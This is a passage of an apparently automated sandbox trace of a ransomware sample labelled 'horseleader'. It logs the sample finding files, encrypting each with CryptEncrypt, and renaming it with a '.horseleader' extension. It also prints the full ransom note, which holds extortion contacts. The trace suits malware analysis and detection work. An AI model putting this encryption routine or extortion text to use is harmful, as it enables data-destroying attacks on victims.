Size=0x840) returned 0x7dc820 [0248.448] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*") returned 66 [0248.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.449] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.449] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\.") returned 66 [0248.449] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.449] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7516b10, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7941190, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7941190, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.449] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.449] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\..") returned 67 [0248.449] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.449] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0248.450] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb22e200, ftCreationTime.dwHighDateTime=0x1c82168, ftLastAccessTime.dwLowDateTime=0x753cc70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbb22e200, ftLastWriteTime.dwHighDateTime=0x1c82168, nFileSizeHigh=0x0, nFileSizeLow=0x38200, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1FREN.DLL", cAlternateFileName="")) returned 1 [0248.450] lstrcmpiW (lpString1="MSB1FREN.DLL", lpString2="Windows") returned -1 [0248.450] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned 77 [0248.450] StrStrIW (lpFirst="MSB1FREN.DLL", lpSrch=".horseleader") returned 0x0 [0248.450] lstrcmpW (lpString1="MSB1FREN.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.450] lstrcmpW (lpString1="MSB1FREN.DLL", lpString2="_uninstalling_.png") returned 1 [0248.450] lstrlenW (lpString=".testttjffg") returned 11 [0248.450] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL", lpSrch=".testttjffg") returned 0x0 [0248.450] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.450] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.450] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 
[0248.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned 77 [0248.451] StrStrW (lpFirst="MSB1FREN.DLL", lpSrch=".txt") returned 0x0 [0248.451] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=229888) returned 1 [0248.452] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.452] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.475] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.475] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.476] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x19900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.476] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.477] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.477] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.477] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x33200, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.477] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.485] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.485] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.486] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.486] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.486] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.486] CloseHandle (hObject=0x1a4) returned 1 [0248.486] GetProcessHeap () returned 0x780000 [0248.486] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.487] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.horseleader") returned 89 [0248.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.dll.horseleader")) returned 1 [0248.488] GetProcessHeap () returned 0x780000 [0248.488] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.488] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x238a8600, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x753cc70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x238a8600, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xcd2ac, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1FREN.ITS", cAlternateFileName="")) returned 1 [0248.488] lstrcmpiW (lpString1="MSB1FREN.ITS", lpString2="Windows") returned -1 [0248.488] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS") returned 77 [0248.488] StrStrIW (lpFirst="MSB1FREN.ITS", lpSrch=".horseleader") returned 0x0 [0248.488] lstrcmpW (lpString1="MSB1FREN.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.488] lstrcmpW (lpString1="MSB1FREN.ITS", lpString2="_uninstalling_.png") returned 1 [0248.488] lstrlenW (lpString=".testttjffg") returned 11 [0248.489] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS", lpSrch=".testttjffg") returned 0x0 [0248.489] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.489] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.489] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS") returned 77 [0248.489] StrStrW (lpFirst="MSB1FREN.ITS", lpSrch=".txt") returned 0x0 [0248.489] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=840364) returned 1 [0248.490] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.490] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.492] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.492] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.493] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x64156, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.493] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.504] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.504] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.504] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xc82ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.505] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.507] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.508] CloseHandle (hObject=0x1a4) returned 1 [0248.508] GetProcessHeap () returned 0x780000 [0248.508] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.508] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS.horseleader") returned 89 
[0248.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\msb1fren.its.horseleader")) returned 1 [0248.510] GetProcessHeap () returned 0x780000 [0248.510] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.510] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d99e900, ftCreationTime.dwHighDateTime=0x1be6f08, ftLastAccessTime.dwLowDateTime=0x79672f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d99e900, ftLastWriteTime.dwHighDateTime=0x1be6f08, nFileSizeHigh=0x0, nFileSizeLow=0x96a00, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WT61FR.LEX", cAlternateFileName="")) returned 1 [0248.510] lstrcmpiW (lpString1="WT61FR.LEX", lpString2="Windows") returned 1 [0248.510] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX") returned 75 [0248.510] StrStrIW (lpFirst="WT61FR.LEX", lpSrch=".horseleader") returned 0x0 [0248.510] lstrcmpW (lpString1="WT61FR.LEX", lpString2="#Decrypt#.txt") returned 1 [0248.510] lstrcmpW (lpString1="WT61FR.LEX", lpString2="_uninstalling_.png") returned 1 [0248.510] lstrlenW (lpString=".testttjffg") returned 11 [0248.510] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX", lpSrch=".testttjffg") returned 0x0 [0248.510] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.510] 
CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.510] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX") returned 75 [0248.512] StrStrW (lpFirst="WT61FR.LEX", lpSrch=".txt") returned 0x0 [0248.512] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=616960) returned 1 [0248.512] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.512] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.521] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.521] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.522] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x48d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.522] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.541] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.541] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.541] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x91a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.542] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.551] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.551] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.551] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.552] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.552] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.552] CloseHandle (hObject=0x1a4) returned 1 [0248.552] GetProcessHeap () returned 0x780000 [0248.552] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.552] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX.horseleader") returned 87 [0248.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\wt61fr.lex.horseleader")) returned 1 [0248.559] GetProcessHeap () returned 0x780000 [0248.559] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.559] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d99e900, ftCreationTime.dwHighDateTime=0x1be6f08, ftLastAccessTime.dwLowDateTime=0x79672f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d99e900, ftLastWriteTime.dwHighDateTime=0x1be6f08, nFileSizeHigh=0x0, nFileSizeLow=0x96a00, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WT61FR.LEX", cAlternateFileName="")) returned 0 [0248.559] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.559] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\#Decrypt#.txt") returned 78 [0248.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.560] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.560] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.562] lstrlenA (lpString="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") returned 1368 [0248.562] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.562] CloseHandle (hObject=0x158) returned 1 [0248.562] GetProcessHeap () returned 0x780000 [0248.562] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.562] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd541900, ftCreationTime.dwHighDateTime=0x1c911ec, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd541900, ftLastWriteTime.dwHighDateTime=0x1c911ec, nFileSizeHigh=0x0, nFileSizeLow=0x205b0b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSB1AR.LEX", cAlternateFileName="")) returned 1 [0248.562] lstrcmpiW (lpString1="MSB1AR.LEX", lpString2="Windows") returned -1 [0248.562] wnsprintfW (in: pszDest=0x7dbfd8, 